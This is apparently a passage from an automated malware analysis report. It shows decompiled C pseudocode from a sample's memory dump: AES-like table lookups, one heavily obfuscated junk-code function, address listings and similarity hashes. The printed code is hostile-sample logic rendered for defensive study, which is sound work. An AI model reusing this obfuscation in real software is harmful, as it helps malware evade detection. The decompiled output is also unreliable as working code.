						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                          0x00402fb0
                                          0x00402fbf
                                          0x00402fc8
                                          0x00402fd6
                                          0x00402fda
                                          0x00402fe3
                                          0x00402ff4
                                          0x00402ff7
                                          0x00402ffc
                                          0x00403005
                                          0x00403013
                                          0x00403018
                                          0x00403021
                                          0x00403031
                                          0x00403051
                                          0x00403054
                                          0x00403066
                                          0x0040306b
                                          0x00403080
                                          0x0040309d
                                          0x004030a0
                                          0x004030b1
                                          0x004030c6
                                          0x004030e6
                                          0x004030e9
                                          0x004030fb
                                          0x00403119
                                          0x00403136
                                          0x00403139
                                          0x0040314b
                                          0x00403160
                                          0x00403166
                                          0x0040316e
                                          0x0040316f
                                          0x00403172
                                          0x00403180
                                          0x00403190
                                          0x004031a2
                                          0x004031b4
                                          0x004031d0
                                          0x004031e3
                                          0x004031f0
                                          0x00403201
                                          0x00403218
                                          0x0040323a
                                          0x0040323d
                                          0x0040324e
                                          0x00403269
                                          0x00403280
                                          0x00403283
                                          0x00403295
                                          0x0040329d
                                          0x004032b2
                                          0x004032cf
                                          0x004032d2
                                          0x004032e3
                                          0x00403307
                                          0x00403317
                                          0x0040331a
                                          0x0040332c
                                          0x00403344
                                          0x00403347
                                          0x0040335a
                                          0x00403367
                                          0x00403379
                                          0x00403391
                                          0x004033b4
                                          0x004033b7
                                          0x004033c9
                                          0x004033de
                                          0x004033e4
                                          0x004033e4
                                          0x004033e7
                                          0x004033e7
                                          0x00403180
                                          0x0040344b
                                          0x00403454
                                          0x00403462
                                          0x004034c0
                                          0x004034c9
                                          0x004034d7
                                          0x00403539
                                          0x00403542
                                          0x0040354f
                                          0x00403552
                                          0x0040359e
                                          0x004035aa
                                          0x004035b3
                                          0x004035c0
                                          0x004035c7

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                          • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041D1F1, Relevance: .4, Instructions: 425COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E0041D1F1(void* __eax, signed int __ebx, void* __edx, signed int __edi, signed int __esi) {
				void* _t60;
				signed int _t61;
				signed char _t62;
				signed char _t63;
				signed int _t65;
				signed int _t84;
				signed int _t88;
				signed int _t89;

				_t89 = __esi;
				_t84 = __edi;
				_t65 = __ebx;
				_pop(_t71);
				 *0x2451abdf =  *0x2451abdf >> 0x2d;
				if(__eax < 0x92b409f1) {
					__eax =  *0x90b367d * 0xcfa4;
					_push( *0x2da86097);
					if(__eax < 0) {
						__ecx =  *0x659a980b;
						__edi = __edi +  *0x2ee2edea;
						if(__edi >= 0) {
							asm("sbb edi, 0xc57dbc70");
							__edi = __edi &  *0xde3a100e;
							__edi = __edi ^ 0xd45adf36;
							__edi = __edi - 0xe4c18a9;
							__eax = __eax + 1;
							__esp = __esp - 1;
							__dl = __dl ^  *0xd94d4d12;
							__ecx = __ecx -  *0x70a9ef2b;
							_push(__ebp);
							asm("cmpsb");
							_push( *0x40283edc);
							 *0x9bc29830 =  *0x9bc29830 << 0x72;
							asm("movsw");
							asm("sbb ch, 0x12");
							 *0x377969e5 =  *0x377969e5 + __ah;
							asm("adc ecx, [0xee785d1e]");
							__esi = __esi -  *0xc5be299d;
							__edi = __edi - 0x5a0da59a;
							if(__edi < 0) {
								asm("ror dword [0x39203371], 0xbf");
								 *0xcc2d50dc =  *0xcc2d50dc + __ecx;
								__ebx = __ebx ^ 0x38c47abc;
								__ecx = __ecx - 1;
								__ebp = 0x1f329c62;
								__ebx =  *0xe122f43d;
								asm("scasb");
								if( *0xf74aec12 >= __cl) {
									__edx =  *0xf303367c * 0x2938;
									__ecx = __ecx -  *0x6717a711;
									__ebx = __ebx +  *0x2a346015;
									__edx =  *0xf303367c * 0x2938 -  *0x2fde27bb;
									asm("ror byte [0x427500b6], 0x2");
									 *0xd4dc5368 =  *0xd4dc5368 << 0xc1;
									_pop(__ebx);
									__esp = 0xfebfbcfb;
									 *0x207b0a32 =  *0x207b0a32 + __ch;
									 *0xcfe60689 =  *0xcfe60689 & __edi;
									__ecx = __ecx -  *0x1f7f4c2e;
									__bh =  *0x8f2077e2;
									asm("sbb esp, [0x57309fb9]");
									__ebx = __edi;
									__al =  *0x23db7e4;
									asm("adc edx, 0x943822e");
									__esp = __esp |  *0xcc1306f4;
									 *0xd2df34e6 =  *0xd2df34e6 | __bh;
									asm("sbb dh, [0x2c2715e3]");
									__cl = __cl +  *0x3a619824;
									__ebx = __ebx ^  *0x18c5c509;
									__esp = __esp +  *0xea8b5111;
									 *0x32f9c7f7 =  *0x32f9c7f7 ^ __eax;
									 *0x82909c15 =  *0x82909c15 << 0x8a;
									__esp = __esp + 1;
									__ebx =  *0x41eaf761;
									_t25 = __ecx;
									__ecx =  *0x3651c635;
									 *0x3651c635 = _t25;
									 *0x1546991 =  *0x1546991 >> 0xe4;
									 *0x85358fb =  *0x85358fb | __ebx;
									__bl = __bl ^ 0x00000028;
									__edi = __edi - 1;
									__ecx =  *0x3651c635 ^  *0x89070321;
									asm("movsw");
									asm("sbb esp, [0xb2de933e]");
									__ebp = 0x1f329c62 ^  *0x44521c0;
									__esi = __esi &  *0x4218d067;
									__dl = __dl -  *0x78f1ccb4;
									__edi = __edi &  *0xbe599e95;
									asm("stosd");
									 *0x91d1ddef =  *0x91d1ddef << 0x78;
									__ebx = __ebx ^  *0xd046ccc0;
									asm("rol dword [0xf995b199], 0x1a");
									__ebp = (0x1f329c62 ^  *0x44521c0) & 0xecab9fcc;
									__ecx =  *0x3651c635 ^  *0x89070321 ^  *0xaae82505;
									__esi = __esi ^  *0xa0a2e6c4;
									__ebp = (0x1f329c62 ^  *0x44521c0) & 0xecab9fcc ^ 0x05faf19d;
									asm("rol byte [0x94d92024], 0xe5");
									if((((0x1f329c62 ^  *0x44521c0) & 0xecab9fcc ^ 0x05faf19d) & 0xa02acecb) < 0) {
										__edi =  *0x4005977d * 0x70a8;
										 *0x240518da =  *0x240518da << 0xdb;
										asm("rol byte [0x18d25b8a], 0xc4");
										__esi = __esi &  *0xc40518ed;
										__esp = __esp +  *0x18d91d15;
										 *0x2112d005 =  *0x2112d005 >> 0x2c;
										__esp = __esp ^  *0x940518db;
										 *0x18eb8dd3 = __esi;
										 *0xae7c4903 =  *0xae7c4903 & __edx;
										_t30 = __al;
										__al =  *0x5e342504;
										 *0x5e342504 = _t30;
										__edi =  *0x3704cf65;
										 *0x3704cf65 =  *0x4005977d * 0x70a8;
										__al =  *0x4cf6bb7;
										__dh = __dh + 0xb6;
										 *0x91ea5305 =  *0x91ea5305 | __edx;
										asm("sbb [0x220518ed], esp");
										 *0x18ef90c0 =  *0x18ef90c0 + __esp;
										__esp = __esp ^  *0xc0187307;
										_push(0xb8668b83);
										__ecx = __ecx + 0xc1aa9e07;
										 *0xb8627886 =  *0xb8627886 + __ch;
										asm("rcl dword [0xb86ab5f5], 0xcb");
										asm("rol byte [0x452eef08], 0xcd");
										 *0xa1242425 =  *0xa1242425 >> 0x93;
										if( *0xa1242425 >= 0) {
											 *0x1a910870 =  *0x1a910870 | __edx;
											__esi = __esi + 1;
											__ebp =  *0x70bf4101;
											asm("rcl byte [0x1c52bb08], 0xcb");
											__esp = __esp ^ 0xaa4e2f05;
											if(__esp >= 0) {
												asm("adc esp, 0x42b90870");
												asm("sbb [0x35f51a3e], ebp");
												asm("rcl byte [0xf40970b3], 0xdb");
												_push( *0x9ed2659a);
												__bh = __bh ^  *0x367057e6;
												asm("adc edx, [0xa67cf709]");
												__al = __al -  *0xe3093688;
												asm("sbb cl, 0xa");
												asm("sbb edi, [0xa366f65]");
												_push( *0xcd03f61b);
												if(__ecx <=  *0xda235bd4) {
													__ecx = __ecx ^ 0x8e15aa77;
													_t38 = __al;
													__al =  *0xac0bd3f9;
													 *0xac0bd3f9 = _t38;
													__edi = __edi ^ 0xfa8b91fe;
													__eax = __eax + 1;
													__ecx = __ecx &  *0x38d708c5;
													__ebx = __ebx &  *0x502b4ed9;
													asm("stosd");
													if(__ebx >= 0) {
														__ebp = __ebp + 0x88211170;
														__eax = __eax + 1;
														asm("adc [0x1d2a9aea], esi");
														asm("rcr byte [0x352eea82], 0x5e");
														__ebx =  *0xa4893c96;
														_push(__edx);
														__ecx = __ecx -  *0xc96fa9fd;
														__esp = __esp + 1;
														__esi =  *0x2dd7dd6b * 0xb72b;
														__ch = __ch ^  *0xfbf3c83c;
														asm("adc eax, [0x120e939e]");
														if(__ch != 0) {
															__eax = __eax + 0x2de9439f;
															_push(__ebx);
															asm("rcl dword [0x24978631], 0xc8");
															__ebp =  *0x9193826b * 0xba5;
															_push(0xaf54ac27);
															__esi = __esi - 1;
															__ebx = __ebx -  *0x1006c52d;
															 *0x319a0c91 =  *0x319a0c91 | __edi;
															_push( *0x1cec3f94);
															__esi = __esi | 0x86e1188b;
															__eax =  *0x4007fbc5;
															__eax =  *0x4007fbc5 - 1;
															__ebx = __ebx -  *0x21347d05;
															asm("adc ecx, 0xfd1916b8");
															__ebp =  *0x9193826b * 0xba5 - 1;
															__bl = __bl -  *0x5d83d812;
															_push( *0x163e8c2b);
															_pop(__ebx);
															_pop( *0xd383d219);
															asm("rol dword [0xa21d11f4], 0x55");
															__ah = __ah - 0xca;
															__edi = __edi ^  *0x46fd9997;
															if(__edi < 0) {
																asm("adc eax, [0xa11c3429]");
																asm("rol dword [0xad107565], 0x3");
																asm("scasb");
																__ebx =  *0xf528092b;
																__ebp = __ebp +  *0x4fe6a93d;
																__esp =  *0x199b4f69 * 0xaf08;
																asm("rol byte [0x5dbb4d10], 0x7b");
																 *0x906559c0 =  *0x906559c0 >> 0x11;
																__esi = 0x5bb18cdc;
																__eax = __eax + 1;
																__ecx = __ecx - 0xd2670303;
																__bl = __bl +  *0x22e1ecd7;
																asm("rcl dword [0x850d639f], 0x6b");
																if(__eax ==  *0xde0b6d29) {
																	__ebp = __ebp & 0xa94b5875;
																	__esp = __esp | 0xc0c07cbe;
																	__edi = __edi +  *0x9d5266c8;
																	 *0x6f5ac9c4 =  *0x6f5ac9c4 & __ebp;
																	if( *0x6f5ac9c4 != 0) {
																		asm("rcr dword [0xfeced74], 0xaf");
																		asm("adc cl, 0xb7");
																		__edi = __edi | 0xcfe1e211;
																		__bl = __bl ^ 0x00000034;
																		asm("rcl dword [0xbea919d5], 0x9");
																		 *0x4a0125b4 =  *0x4a0125b4 >> 0x5c;
																		 *0x37934b26 =  *0x37934b26 >> 0xa2;
																		__ebp = 0xc7d2436d;
																		 *0xabda2d03 =  *0xabda2d03 << 0x63;
																		__eax =  *0x575d4a6a * 0x9fe3;
																		asm("rol dword [0xe7c84492], 0x37");
																		if( *0x575d4a6a * 0x9fe3 < 0) {
																			__ebp =  *0x50250b7d * 0x640e;
																			L1();
																			asm("rol dword [0x33963f0e], 0x22");
																			__cl = __cl ^ 0x000000e6;
																			asm("adc [0x72ac8fb4], ah");
																			__cl = __cl -  *0xfe757412;
																			_pop(__esi);
																			__esp = __esp - 1;
																			 *0xd47e5686 = __cl;
																			 *0x74bcc0c =  *0x74bcc0c << 0x56;
																			asm("sbb ebp, 0x8ccef4df");
																			__ecx = __ecx ^ 0xc7193436;
																			asm("ror dword [0xf3247d2b], 0x9d");
																			 *0x3df6a62e =  *0x3df6a62e - __esi;
																			__esi = __esi -  *0xbb9db21b;
																			__edi = __edi +  *0x255622b9;
																			_pop(__ecx);
																			__bl = __bl | 0x00000088;
																			__ecx = __ecx + 1;
																			__esp = __esp |  *0xe3168c3b;
																			 *0x63d10d29 =  *0x63d10d29 & __esi;
																			if( *0x63d10d29 >= 0) {
																				__edx = __edx ^ 0xb4d44172;
																				__ecx = __ecx &  *0x5b9013ec;
																				_pop(__ecx);
																				__esi = __esi ^  *0x852a131d;
																				asm("rcl byte [0x2fb3018a], 0x23");
																				 *0x491ea1e1 =  *0x491ea1e1 & __ch;
																				 *0xa14589b7 =  *0xa14589b7 & __bh;
																				 *0x9e0289bc =  *0x9e0289bc >> 0xbc;
																				asm("adc bl, 0xb1");
																				_t55 = __esp;
																				__esp =  *0xb6587b1f;
																				 *0xb6587b1f = _t55;
																				 *0x597a3608 =  *0x597a3608 | __al;
																				__ebp = __ebp + 1;
																				__ebx = __ebx + 1;
																				__ebx = __ebx + 1;
																				asm("lodsb");
																				if(__ebx >= 0) {
																					 *0xdbad1370 =  *0xdbad1370 >> 0xfe;
																					 *0x1d4ff895 =  *0x1d4ff895 ^ __edi;
																					asm("adc eax, [0x16c77a19]");
																					__ecx = __ecx |  *0x67b6a0d5;
																					__ebx = __ebx - 1;
																					asm("adc cl, [0x73ba9312]");
																					 *0xeb812d2f =  *0xeb812d2f | __esi;
																					__ebx = __ebx &  *0x6a68cc2e;
																					asm("movsb");
																					 *0x3e18a5a3 =  *0x3e18a5a3 << 0x29;
																					__esp =  *0xf428426a * 0xbd32;
																					asm("rcr dword [0xb66424fd], 0x46");
																					_push(0x442e78bc);
																					asm("scasb");
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				while(1) {
					L1:
					 *0xafc4e909 =  *0xafc4e909 << 0x95;
					 *0x45a888cf =  *0x45a888cf + _t89;
					_pop( *0x2e0d36a1);
					_t65 = _t65 +  *0xf04a47fa;
					if(_t65 < 0) {
						continue;
					}
					L2:
					asm("rol dword [0xcc521fea], 0x1e");
					_push(_t71);
					asm("rcr dword [0xd385ee8f], 0x16");
					asm("rol dword [0x570d919], 0xca");
					 *0xa0af9322 =  *0xa0af9322 >> 0x79;
					asm("adc edx, [0x29c07b16]");
					 *0x28bb49b4 = (_t65 | 0x000000b2) + 0xcc203693;
					 *0xc756d085 = _t89;
					_push( *0xc756d085);
					_t60 = 0x32 -  *0xabfaad36 -  *0xdc1dc510;
					 *0xad0ae102 =  *0xad0ae102 &  *0x12fa4fcb;
					_t71 = 0x4b808c0e;
					_push( *0xbae23bf7);
					_t96 = 0xc86709d3;
					_t65 =  *0x536beec;
					 *0xc56a0a18 =  *0xc56a0a18 >> 0xf3;
					_t84 = (_t84 | 0x6822b272) -  *0x5dd48cd + 2;
					_t89 =  *0xad3eb6b * 0x909e;
					if(_t89 == 0) {
						while(1) {
							L1:
							 *0xafc4e909 =  *0xafc4e909 << 0x95;
							 *0x45a888cf =  *0x45a888cf + _t89;
							_pop( *0x2e0d36a1);
							_t65 = _t65 +  *0xf04a47fa;
							if(_t65 < 0) {
								continue;
							}
							goto L2;
							do {
								do {
									do {
										do {
											do {
												do {
													goto L1;
												} while (_t65 < 0);
												goto L2;
											} while (_t89 == 0);
											goto L3;
										} while (_t65 > 0);
										_t89 =  *0x8a83ea7f * 0x2af4;
										asm("adc [0x6cd8c587], edi");
									} while (_t89 >= 0);
									_t96 =  *0xc5a85e71;
									 *0xc5a85e71 = 0xc86709d3;
									_push( *0x3e2ba59b);
									 *0x246ca9a3 =  *0x246ca9a3 | 0x5c796b83;
									 *0x3b2544bf =  *0x3b2544bf >> 0x99;
									_t71 = 0x4b808c0e +  *0x9237aa96;
									asm("sbb ecx, [0x99ebf6ec]");
									asm("adc esi, 0x3f59e8b8");
									_push(_t65);
									asm("sbb ebp, [0xaa5c3001]");
									asm("adc edx, [0xb5d75ea9]");
									 *0xd5930688 =  *0xd5930688 - 0x5c796b84;
								} while (( *0x8efe5ebc & _t61) <= 0);
								_t62 = _t61 & 0x5e238776;
								asm("adc edi, [0x507d7b26]");
								_t84 =  *0x5d182001;
								asm("ror dword [0xa5696b1f], 0xa5");
								asm("sbb [0xdee53639], esp");
								_t89 = _t89 |  *0x9da8de68;
								_t65 = 0x0000002c |  *0xe8323dbc;
								asm("scasb");
								_t71 = _t71 + 1;
							} while (0x4b808c0e < 0);
							_t63 = _t62 ^ 0x00000086;
							 *0xa2302b1f =  *0xa2302b1f & _t96;
							_t11 = _t65 &  *0xa967ff9e;
							_t65 =  *0xa6efbdba;
							 *0xa6efbdba = _t11;
							_t84 = _t84 ^  *0x2e3f66ee;
							asm("movsw");
							_pop(_t89);
							if(0x5c796b83 != 0) {
								continue;
							} else {
								asm("sbb esi, [0x19794f75]");
								 *0xfe510fca = 0x5c796b83;
								asm("stosd");
								_t88 =  *0xfe4a1fcd;
								 *0x66368e91 =  *0x66368e91 + _t88;
								asm("adc dl, 0xb0");
								asm("adc edx, [0x5e9f141b]");
								_t71 = (_t71 &  *0xb6504bfa) + 1;
								 *0xcb5f57f0 =  *0xcb5f57f0 ^ 0x4b808c0e;
								asm("rol dword [0x4362de1b], 0xd0");
								_push(0x4b808c0e);
								_t65 = _t65 | 0x000000e4;
								 *0xd5d43784 =  *0xd5d43784 ^  *0xfe510fca;
								_t84 = _t88 |  *0xf654d60b;
								if(_t84 >= 0) {
									continue;
								} else {
									_push(_t65);
									asm("rcr dword [0xe6959d27], 0x96");
									return _t63 + 1;
								}
							}
						}
					}
					L3:
					 *0x60b4ef74 =  *0x60b4ef74 << 0x4a;
					 *0xfd3ea67 =  *0xfd3ea67 + 0x4b808c0e;
					asm("stosd");
					_t61 = _t60 - 1;
					_t65 = (_t65 |  *0xe22f6564) & 0xb5541205;
					L1:
					 *0xafc4e909 =  *0xafc4e909 << 0x95;
					 *0x45a888cf =  *0x45a888cf + _t89;
					_pop( *0x2e0d36a1);
					_t65 = _t65 +  *0xf04a47fa;
				}
			}











                                          0x0041d1f1
                                          0x0041d1f1
                                          0x0041d1f1
                                          0x0041d1f6
                                          0x0041d1f7
                                          0x0041d1fe
                                          0x0041d204
                                          0x0041d20e
                                          0x0041d214
                                          0x0041d220
                                          0x0041d226
                                          0x0041d22c
                                          0x0041d232
                                          0x0041d238
                                          0x0041d23e
                                          0x0041d24a
                                          0x0041d262
                                          0x0041d263
                                          0x0041d264
                                          0x0041d26a
                                          0x0041d270
                                          0x0041d271
                                          0x0041d272
                                          0x0041d278
                                          0x0041d27f
                                          0x0041d281
                                          0x0041d284
                                          0x0041d290
                                          0x0041d296
                                          0x0041d29c
                                          0x0041d2a2
                                          0x0041d2a8
                                          0x0041d2b5
                                          0x0041d2c1
                                          0x0041d2c7
                                          0x0041d2c8
                                          0x0041d2cd
                                          0x0041d2d9
                                          0x0041d2da
                                          0x0041d2e0
                                          0x0041d2ea
                                          0x0041d2f7
                                          0x0041d2fd
                                          0x0041d303
                                          0x0041d316
                                          0x0041d31d
                                          0x0041d323
                                          0x0041d324
                                          0x0041d32a
                                          0x0041d330
                                          0x0041d336
                                          0x0041d33d
                                          0x0041d349
                                          0x0041d34a
                                          0x0041d34f
                                          0x0041d355
                                          0x0041d35b
                                          0x0041d361
                                          0x0041d367
                                          0x0041d36d
                                          0x0041d373
                                          0x0041d379
                                          0x0041d37f
                                          0x0041d386
                                          0x0041d387
                                          0x0041d38d
                                          0x0041d38d
                                          0x0041d38d
                                          0x0041d393
                                          0x0041d39a
                                          0x0041d3a0
                                          0x0041d3a3
                                          0x0041d3a4
                                          0x0041d3aa
                                          0x0041d3ac
                                          0x0041d3b2
                                          0x0041d3b8
                                          0x0041d3be
                                          0x0041d3c4
                                          0x0041d3ca
                                          0x0041d3cb
                                          0x0041d3d2
                                          0x0041d3d8
                                          0x0041d3df
                                          0x0041d3eb
                                          0x0041d3f1
                                          0x0041d3f7
                                          0x0041d3fd
                                          0x0041d40a
                                          0x0041d410
                                          0x0041d41a
                                          0x0041d421
                                          0x0041d42e
                                          0x0041d434
                                          0x0041d43a
                                          0x0041d441
                                          0x0041d447
                                          0x0041d44d
                                          0x0041d453
                                          0x0041d453
                                          0x0041d453
                                          0x0041d45f
                                          0x0041d45f
                                          0x0041d465
                                          0x0041d46c
                                          0x0041d47b
                                          0x0041d481
                                          0x0041d487
                                          0x0041d48d
                                          0x0041d493
                                          0x0041d4a4
                                          0x0041d4aa
                                          0x0041d4b6
                                          0x0041d4bd
                                          0x0041d4c4
                                          0x0041d4cb
                                          0x0041d4d1
                                          0x0041d4d7
                                          0x0041d4db
                                          0x0041d4e1
                                          0x0041d4e8
                                          0x0041d4ee
                                          0x0041d4f4
                                          0x0041d4fa
                                          0x0041d500
                                          0x0041d507
                                          0x0041d50d
                                          0x0041d513
                                          0x0041d51f
                                          0x0041d525
                                          0x0041d52e
                                          0x0041d534
                                          0x0041d53a
                                          0x0041d540
                                          0x0041d546
                                          0x0041d546
                                          0x0041d546
                                          0x0041d552
                                          0x0041d558
                                          0x0041d559
                                          0x0041d55f
                                          0x0041d565
                                          0x0041d566
                                          0x0041d56c
                                          0x0041d572
                                          0x0041d573
                                          0x0041d579
                                          0x0041d580
                                          0x0041d58c
                                          0x0041d58d
                                          0x0041d593
                                          0x0041d594
                                          0x0041d59e
                                          0x0041d5a4
                                          0x0041d5aa
                                          0x0041d5b6
                                          0x0041d5bb
                                          0x0041d5bc
                                          0x0041d5c3
                                          0x0041d5cd
                                          0x0041d5d8
                                          0x0041d5d9
                                          0x0041d5e5
                                          0x0041d5eb
                                          0x0041d5f1
                                          0x0041d5f7
                                          0x0041d5fc
                                          0x0041d5fd
                                          0x0041d603
                                          0x0041d609
                                          0x0041d60a
                                          0x0041d616
                                          0x0041d61c
                                          0x0041d61d
                                          0x0041d626
                                          0x0041d62d
                                          0x0041d630
                                          0x0041d636
                                          0x0041d648
                                          0x0041d64e
                                          0x0041d65b
                                          0x0041d65c
                                          0x0041d662
                                          0x0041d668
                                          0x0041d677
                                          0x0041d67e
                                          0x0041d685
                                          0x0041d686
                                          0x0041d687
                                          0x0041d68d
                                          0x0041d699
                                          0x0041d6a0
                                          0x0041d6a6
                                          0x0041d6ad
                                          0x0041d6b3
                                          0x0041d6b9
                                          0x0041d6bf
                                          0x0041d6c5
                                          0x0041d6cc
                                          0x0041d6cf
                                          0x0041d6d5
                                          0x0041d6d8
                                          0x0041d6df
                                          0x0041d6ec
                                          0x0041d6f9
                                          0x0041d704
                                          0x0041d70b
                                          0x0041d715
                                          0x0041d71c
                                          0x0041d722
                                          0x0041d72c
                                          0x0041d737
                                          0x0041d73e
                                          0x0041d741
                                          0x0041d747
                                          0x0041d74d
                                          0x0041d74e
                                          0x0041d755
                                          0x0041d75b
                                          0x0041d762
                                          0x0041d768
                                          0x0041d76e
                                          0x0041d775
                                          0x0041d77b
                                          0x0041d781
                                          0x0041d787
                                          0x0041d788
                                          0x0041d78b
                                          0x0041d78d
                                          0x0041d793
                                          0x0041d799
                                          0x0041d79f
                                          0x0041d7a5
                                          0x0041d7b1
                                          0x0041d7b2
                                          0x0041d7b8
                                          0x0041d7bf
                                          0x0041d7c5
                                          0x0041d7cb
                                          0x0041d7d2
                                          0x0041d7d5
                                          0x0041d7d5
                                          0x0041d7d5
                                          0x0041d7db
                                          0x0041d7e1
                                          0x0041d7e2
                                          0x0041d7e3
                                          0x0041d7e4
                                          0x0041d7e5
                                          0x0041d7eb
                                          0x0041d7f2
                                          0x0041d7f8
                                          0x0041d7fe
                                          0x0041d804
                                          0x0041d80b
                                          0x0041d811
                                          0x0041d81d
                                          0x0041d823
                                          0x0041d824
                                          0x0041d82b
                                          0x0041d835
                                          0x0041d842
                                          0x0041d847
                                          0x0041d847
                                          0x0041d7e5
                                          0x0041d799
                                          0x0041d71c
                                          0x0041d6bf
                                          0x0041d6a0
                                          0x0041d636
                                          0x0041d5aa
                                          0x0041d566
                                          0x0041d53a
                                          0x0041d4ee
                                          0x0041d4cb
                                          0x0041d40a
                                          0x0041d2da
                                          0x0041d2a2
                                          0x0041d22c
                                          0x0041d214
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf9d
                                          0x0041cfa3
                                          0x0041cfa9
                                          0x0041cfaf
                                          0x00000000
                                          0x00000000
                                          0x0041cfb1
                                          0x0041cfb7
                                          0x0041cfd2
                                          0x0041cfd3
                                          0x0041cfda
                                          0x0041cfec
                                          0x0041cff6
                                          0x0041d008
                                          0x0041d024
                                          0x0041d02a
                                          0x0041d031
                                          0x0041d037
                                          0x0041d03d
                                          0x0041d042
                                          0x0041d048
                                          0x0041d054
                                          0x0041d060
                                          0x0041d06d
                                          0x0041d06e
                                          0x0041d078
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf9d
                                          0x0041cfa3
                                          0x0041cfa9
                                          0x0041cfaf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041cf96
                                          0x00000000
                                          0x0041cf96
                                          0x0041d0ae
                                          0x0041d0b8
                                          0x0041d0b8
                                          0x0041d0c4
                                          0x0041d0c4
                                          0x0041d0ca
                                          0x0041d0d1
                                          0x0041d0d7
                                          0x0041d0de
                                          0x0041d0e4
                                          0x0041d0ea
                                          0x0041d0f0
                                          0x0041d0f1
                                          0x0041d0f7
                                          0x0041d0fd
                                          0x0041d103
                                          0x0041d10f
                                          0x0041d114
                                          0x0041d11c
                                          0x0041d122
